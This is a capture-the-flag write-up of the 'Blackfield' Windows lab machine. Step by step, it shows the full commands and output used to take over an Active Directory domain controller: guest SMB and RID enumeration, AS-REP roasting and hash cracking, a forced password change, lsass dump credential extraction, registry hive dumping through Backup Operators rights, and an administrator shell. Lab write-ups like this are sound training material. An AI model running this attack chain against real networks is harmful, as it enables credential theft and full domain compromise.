Blackfield (Windows Hard) | SidePieceVillage

Backfield is a hard Windows machine featuring Windows and Active Directory misconfigurations. Anonymous / Guest access to an SMB share is used to enumerate users. The user is found to have Kerberos pre-authentication disabled, which allows us to conduct an ASREPRoasting attack. This allows us to retrieve a hash of the encrypted material contained in the AS-REP, which can be subjected to an offline brute force attack in order to recover the plaintext password. With this user we can access a SMB share containing forensics artifacts, including an lsass process dump. This contains a username and a password for a user with WinRM privileges, who is also a member of the Backup Operators group. The privileges conferred by this privileged group are used to dump the Active Directory database, and retrieve the hash of the primary domain administrator.

Nmap

PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-02-28 22:58:26Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49677/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

SMB

Looking into shares:

nxc smb blackfield.local -u Guest -p '' --shares
SMB         10.10.10.192    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\Guest:
SMB         10.10.10.192    445    DC01             [*] Enumerated shares
SMB         10.10.10.192    445    DC01             Share           Permissions     Remark
SMB         10.10.10.192    445    DC01             -----           -----------     ------
SMB         10.10.10.192    445    DC01             ADMIN$                          Remote Admin
SMB         10.10.10.192    445    DC01             C$                              Default share
SMB         10.10.10.192    445    DC01             forensic                        Forensic / Audit share.
SMB         10.10.10.192    445    DC01             IPC$            READ            Remote IPC
SMB         10.10.10.192    445    DC01             NETLOGON                        Logon server share
SMB         10.10.10.192    445    DC01             profiles$       READ
SMB         10.10.10.192    445    DC01             SYSVOL                          Logon server share

Since Guest was enabled, I tried getting users by rid bruteforcing. This gave us ALOT of users.

$ nxc smb blackfield.local -u Guest -p '' --rid-brute
<SNIP>
SMB         10.10.10.192    445    DC01             1000: BLACKFIELD\DC01$ (SidTypeUser)
SMB         10.10.10.192    445    DC01             1101: BLACKFIELD\DnsAdmins (SidTypeAlias)
SMB         10.10.10.192    445    DC01             1102: BLACKFIELD\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.10.192    445    DC01             1103: BLACKFIELD\audit2020 (SidTypeUser)
SMB         10.10.10.192    445    DC01             1104: BLACKFIELD\support (SidTypeUser)
SMB         10.10.10.192    445    DC01             1105: BLACKFIELD\BLACKFIELD764430 (SidTypeUser)
SMB         10.10.10.192    445    DC01             1106: BLACKFIELD\BLACKFIELD538365 (SidTypeUser)
<SNIP>
SMB         10.10.10.192    445    DC01             1411: BLACKFIELD\BLACKFIELD653097 (SidTypeUser)
SMB         10.10.10.192    445    DC01             1412: BLACKFIELD\BLACKFIELD438814 (SidTypeUser)
SMB         10.10.10.192    445    DC01             1413: BLACKFIELD\svc_backup (SidTypeUser)
SMB         10.10.10.192    445    DC01             1414: BLACKFIELD\lydericlefebvre (SidTypeUser)
SMB         10.10.10.192    445    DC01             1415: BLACKFIELD\PC01$ (SidTypeUser)
SMB         10.10.10.192    445    DC01             1416: BLACKFIELD\PC02$ (SidTypeUser)
SMB         10.10.10.192    445    DC01             1417: BLACKFIELD\PC03$ (SidTypeUser)
SMB         10.10.10.192    445    DC01             1418: BLACKFIELD\PC04$ (SidTypeUser)
SMB         10.10.10.192    445    DC01             1419: BLACKFIELD\PC05$ (SidTypeUser)
SMB         10.10.10.192    445    DC01             1420: BLACKFIELD\PC06$ (SidTypeUser)
SMB         10.10.10.192    445    DC01             1421: BLACKFIELD\PC07$ (SidTypeUser)
SMB         10.10.10.192    445    DC01             1422: BLACKFIELD\PC08$ (SidTypeUser)
SMB         10.10.10.192    445    DC01             1423: BLACKFIELD\PC09$ (SidTypeUser)
SMB         10.10.10.192    445    DC01             1424: BLACKFIELD\PC10$ (SidTypeUser)
SMB         10.10.10.192    445    DC01             1425: BLACKFIELD\PC11$ (SidTypeUser)
SMB         10.10.10.192    445    DC01             1426: BLACKFIELD\PC12$ (SidTypeUser)
SMB         10.10.10.192    445    DC01             1427: BLACKFIELD\PC13$ (SidTypeUser)
SMB         10.10.10.192    445    DC01             1428: BLACKFIELD\SRV-WEB$ (SidTypeUser)
SMB         10.10.10.192    445    DC01             1429: BLACKFIELD\SRV-FILE$ (SidTypeUser)
SMB         10.10.10.192    445    DC01             1430: BLACKFIELD\SRV-EXCHANGE$ (SidTypeUser)
SMB         10.10.10.192    445    DC01             1431: BLACKFIELD\SRV-INTRANET$ (SidTypeUser)

KERBEROS

From there I validated users via kerbrute. All of them seemed to be valid so thats a drag.

$ kerbrute userenum --dc 10.10.10.192 -d blackfield.local users.list

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 02/28/25 - Ronnie Flathers @ropnop

2025/02/28 11:30:45 >  Using KDC(s):
2025/02/28 11:30:45 >  	10.10.10.192:88

2025/02/28 11:30:50 >  [+] VALID USERNAME:	 Administrator@blackfield.local
2025/02/28 11:30:50 >  [+] VALID USERNAME:	 audit2020@blackfield.local
2025/02/28 11:30:50 >  [+] VALID USERNAME:	 BLACKFIELD189208@blackfield.local
2025/02/28 11:30:50 >  [+] VALID USERNAME:	 DC01$@blackfield.local
2025/02/28 11:30:50 >  [+] VALID USERNAME:	 Guest@blackfield.local
2025/02/28 11:30:50 >  [+] VALID USERNAME:	 support@blackfield.local
<SNIP>
2025/02/28 11:33:27 >  [+] VALID USERNAME:	 svc_backup@blackfield.local
2025/02/28 11:33:27 >  [+] VALID USERNAME:	 BLACKFIELD438814@blackfield.local
2025/02/28 11:33:27 >  [+] VALID USERNAME:	 BLACKFIELD653097@blackfield.local
2025/02/28 11:33:32 >  [+] VALID USERNAME:	 PC10$@blackfield.local
2025/02/28 11:33:32 >  [+] VALID USERNAME:	 PC07$@blackfield.local
2025/02/28 11:33:32 >  [+] VALID USERNAME:	 SRV-WEB$@blackfield.local
2025/02/28 11:33:32 >  [+] VALID USERNAME:	 PC09$@blackfield.local
2025/02/28 11:33:32 >  [+] VALID USERNAME:	 PC13$@blackfield.local
2025/02/28 11:33:32 >  [+] VALID USERNAME:	 PC11$@blackfield.local
2025/02/28 11:33:32 >  [+] VALID USERNAME:	 PC05$@blackfield.local
2025/02/28 11:33:32 >  [+] VALID USERNAME:	 PC06$@blackfield.local
2025/02/28 11:33:32 >  [+] VALID USERNAME:	 PC08$@blackfield.local
2025/02/28 11:33:32 >  [+] VALID USERNAME:	 PC12$@blackfield.local
2025/02/28 11:33:38 >  [+] VALID USERNAME:	 SRV-EXCHANGE$@blackfield.local
2025/02/28 11:33:38 >  [+] VALID USERNAME:	 SRV-FILE$@blackfield.local
2025/02/28 11:33:38 >  [+] VALID USERNAME:	 SRV-INTRANET$@blackfield.local
2025/02/28 11:33:38 >  Done! Tested 333 usernames (332 valid) in 172.662 seconds

Never the less, I wanted to see if anyone has PRE-AUTH DISABLED. We got one user support.

$ GetNPUsers.py -dc-ip 10.10.10.192 -dc-host blackfield.local -usersfile users.list -no-pass 'blackfield.local/'

[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User DC01$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$support@BLACKFIELD.LOCAL:a0fc2d3cd96d551c43ed7ddfcf9f0efa$9861e8be198b1bbf19120a2f99a8<SNIP>
[-] User BLACKFIELD764430 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User BLACKFIELD538365 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User BLACKFIELD189208 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User BLACKFIELD404458 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User BLACKFIELD706381 doesn't have UF_DONT_REQUIRE_PREAUTH set
<SNIP>

GREAT SUCCESS
Cracking this with hashcat gives us a clear text password.

$ hashcat support.hash /usr/share/wordlists/rockyou.txt --show
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:

18200 | Kerberos 5, etype 23, AS-REP | Network Protocol

NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.

$krb5asrep$23$support@BLACKFIELD.LOCAL:a0fc2d3cd96d551c43ed7ddfcf9f0efa$9861e8be198b1bbf19120a2f99a8d05d7363d86f881bc81256c8271b7f1985c<SNIP>4ea9c8feea6ec223314fc227ee3c240d7f03998089456763f2cdb4aace7a32d41f6f9b9b11d2553afdb985948a6f58e2366b804:<SNIP>

BloodHound

Now we have some credentials to get a bloodhound dump.

$ nxc ldap 10.10.10.192 -u support -p '<SNIP>' --dns-server 10.10.10.192 --bloodhound -c All
SMB         10.10.10.192    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
LDAP        10.10.10.192    389    DC01             [+] BLACKFIELD.local\support:<SNIP>
LDAP        10.10.10.192    389    DC01             Resolved collection methods: rdp, acl, container, session, trusts, psremote, dcom, objectprops, localadmin, group
LDAP        10.10.10.192    389    DC01             Done in 00M 08S
LDAP        10.10.10.192    389    DC01             Compressing output into /home/jaybit/.nxc/logs/DC01_10.10.10.192_2025-02-28_114320_bloodhound.zip

Looking at our pwnd user support, we see we have ForceChangePassword over audit2020. So using bloodyAD(MyFaV), we change his password.

$ ./bloodyAD.py -v DEBUG -u 'support' -p '<SNIP>' --host 10.10.10.192 -d blackfield.local set password audit2020 Password123
[*] Trying to connect to 10.10.10.192...
[+] Connection successful
[+] Password changed successfully!

Now back to SMB and see what he has access to.

SMB Round 2

Running NetExec shows we have READ to the forencis share.

$ nxc smb blackfield.local -u audit2020 -p Password123 --shares
SMB         10.10.10.192    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\audit2020:Password123
SMB         10.10.10.192    445    DC01             [*] Enumerated shares
SMB         10.10.10.192    445    DC01             Share           Permissions     Remark
SMB         10.10.10.192    445    DC01             -----           -----------     ------
SMB         10.10.10.192    445    DC01             ADMIN$                          Remote Admin
SMB         10.10.10.192    445    DC01             C$                              Default share
SMB         10.10.10.192    445    DC01             forensic        READ            Forensic / Audit share.
SMB         10.10.10.192    445    DC01             IPC$            READ            Remote IPC
SMB         10.10.10.192    445    DC01             NETLOGON        READ            Logon server share
SMB         10.10.10.192    445    DC01             profiles$       READ
SMB         10.10.10.192    445    DC01             SYSVOL          READ            Logon server share

Looking into this share with impacket-smbclient showed us a couple to choose from.

$ impacket-smbclient -dc-ip 10.10.10.192 'blackfield.local/audit2020:Password123@blackfield.local'
Impacket v0.13.0.dev0+20241024.90011.835e1755 - Copyright Fortra, LLC and its affiliated companies

Type help for list of commands
# use forensic
# ls
drw-rw-rw-          0  Sun Feb 23 09:10:16 2020 .
drw-rw-rw-          0  Sun Feb 23 09:10:16 2020 ..
drw-rw-rw-          0  Sun Feb 23 12:14:37 2020 commands_output
drw-rw-rw-          0  Thu May 28 15:29:24 2020 memory_analysis
drw-rw-rw-          0  Fri Feb 28 16:30:34 2020 tools

This looks like a dump of some sort from the DC based on the tools and commands_output directory.

Tools Directory:

# ls
drw-rw-rw-          0  Fri Feb 28 16:30:34 2020 .
drw-rw-rw-          0  Fri Feb 28 16:30:34 2020 ..
drw-rw-rw-          0  Fri Feb 28 16:30:34 2020 sleuthkit-4.8.0-win32
drw-rw-rw-          0  Fri Feb 28 16:30:35 2020 sysinternals
drw-rw-rw-          0  Fri Feb 28 16:30:35 2020 volatility

Commands_output Directory:

# ls
drw-rw-rw-          0  Sun Feb 23 12:14:37 2020 .
drw-rw-rw-          0  Sun Feb 23 12:14:37 2020 ..
-rw-rw-rw-        528  Sun Feb 23 12:12:54 2020 domain_admins.txt
-rw-rw-rw-        962  Sun Feb 23 12:12:54 2020 domain_groups.txt
-rw-rw-rw-      16454  Fri Feb 28 16:32:17 2020 domain_users.txt
-rw-rw-rw-     518202  Sun Feb 23 12:12:54 2020 firewall_rules.txt
-rw-rw-rw-       1782  Sun Feb 23 12:12:54 2020 ipconfig.txt
-rw-rw-rw-       3842  Sun Feb 23 12:12:54 2020 netstat.txt
-rw-rw-rw-       3976  Sun Feb 23 12:12:54 2020 route.txt
-rw-rw-rw-       4550  Sun Feb 23 12:12:54 2020 systeminfo.txt
-rw-rw-rw-       9990  Sun Feb 23 12:12:54 2020 tasklist.txt

Memory_analysis Directory:

     3842  Sun Feb 23 12:12:54 2020 netstat.txt
-rw-rw-rw-       3976  Sun Feb 23 12:12:54 2020 route.txt
-rw-rw-rw-       4550  Sun Feb 23 12:12:54 2020 systeminfo.txt
-rw-rw-rw-       9990  Sun Feb 23 12:12:54 2020 tasklist.txt
# cd ../memory_analysis
# ls
drw-rw-rw-          0  Thu May 28 15:29:24 2020 .
drw-rw-rw-          0  Thu May 28 15:29:24 2020 ..
-rw-rw-rw-   37876530  Thu May 28 15:29:24 2020 conhost.zip
-rw-rw-rw-   24962333  Thu May 28 15:29:24 2020 ctfmon.zip
-rw-rw-rw-   23993305  Thu May 28 15:29:24 2020 dfsrs.zip
-rw-rw-rw-   18366396  Thu May 28 15:29:24 2020 dllhost.zip
-rw-rw-rw-    8810157  Thu May 28 15:29:24 2020 ismserv.zip
-rw-rw-rw-   41936098  Thu May 28 15:29:24 2020 lsass.zip
-rw-rw-rw-   64288607  Thu May 28 15:29:24 2020 mmc.zip
-rw-rw-rw-   13332174  Thu May 28 15:29:24 2020 RuntimeBroker.zip
-rw-rw-rw-  131983313  Thu May 28 15:29:24 2020 ServerManager.zip
-rw-rw-rw-   33141744  Thu May 28 15:29:24 2020 sihost.zip
-rw-rw-rw-   33756344  Thu May 28 15:29:24 2020 smartscreen.zip
-rw-rw-rw-   14408833  Thu May 28 15:29:24 2020 svchost.zip
-rw-rw-rw-   34631412  Thu May 28 15:29:24 2020 taskhostw.zip
-rw-rw-rw-   14255089  Thu May 28 15:29:24 2020 winlogon.zip
-rw-rw-rw-    4067425  Thu May 28 15:29:24 2020 wlms.zip
-rw-rw-rw-   18303252  Thu May 28 15:29:24 2020 WmiPrvSE.zip

The lsass.zip caught my eye so I downloaded that to my machine and unziped it.

$ unzip lsass.zip
Archive:  lsass.zip
  inflating: lsass.DMP
$ file lsass.DMP
lsass.DMP: Mini DuMP crash report, 16 streams, Sun Feb 23 18:02:01 2020, 0x421826 type

So we have a dump. We can use a python3 module pypykatz to dump this. This dumps everything including svc_backup‘s hash.

$ python3 -m pypykatz lsa minidump lsass.DMP
INFO:pypykatz:Parsing file lsass.DMP
FILE: ======== lsass.DMP =======
== LogonSession ==
authentication_id 406458 (633ba)
session_id 2
username svc_backup
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T18:00:03.423728+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-1413
luid 406458
	== MSV ==
		Username: svc_backup
		Domain: BLACKFIELD
		LM: NA
		NT: <SNIP>
		SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
		DPAPI: a03cd8e9d30171f3cfe8caad92fef621
<SNIP>

Shell as svc_backup

Getting on the box and seeing what privileges we have.

*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami /all
<SNIP>
GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators                   Alias            S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
<SNIP>
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
<SNIP>

So where part of BackupOperators. Shouldn’t be too hard. Lets backup the SAM,SYSTEM,and SECURITY.

*Evil-WinRM* PS C:\Users\svc_backup\Documents> reg.exe save hklm\sam SAM.save
The operation completed successfully.

*Evil-WinRM* PS C:\Users\svc_backup\Documents> reg.exe save hklm\system SYSTEM.save
The operation completed successfully.

*Evil-WinRM* PS C:\Users\svc_backup\Documents> reg.exe save hklm\security SECURITY.save
reg.exe : ERROR: Access is denied.
    + CategoryInfo          : NotSpecified: (ERROR: Access is denied.:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError

Hmmm….can’t backup the SECURITY locally, lets try remotely.

$ reg.py 'blackfield.local'/'svc_backup'@'10.10.10.192' -hashes :<SNIP> save -keyName 'HKLM\SECURITY' -o 'C:\Users\svc_backup\Documents\'
Impacket v0.13.0.dev0+20241024.90011.835e1755 - Copyright Fortra, LLC and its affiliated companies

[!] Cannot check RemoteRegistry status. Triggering start trough named pipe...
[*] Saved HKLM\SECURITY to C:\Users\svc_backup\Documents\\SECURITY.save

Now we can download them on to our machine and dump the secrets.

*Evil-WinRM* PS C:\Users\svc_backup\Documents> ls


    Directory: C:\Users\svc_backup\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        2/28/2025   3:54 PM          45056 SAM.save
-a----        2/28/2025   6:02 PM          32768 SECURITY.save
-a----        2/28/2025   3:54 PM       17371136 SYSTEM.save

All the SECRETS!!!

$ secretsdump.py -sam SAM.save -system SYSTEM.save -security SECURITY.save LOCAL
Impacket v0.13.0.dev0+20241024.90011.835e1755 - Copyright Fortra, LLC and its affiliated companies

[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<SNIP>:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
<SNIP>
[*] Cleaning up...

Shell as Administrator

Finally, we are administrator on the machine.

$ evil-winrm -i blackfield.local -u Administrator -p <SNIP>

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami;hostname
blackfield\administrator
DC01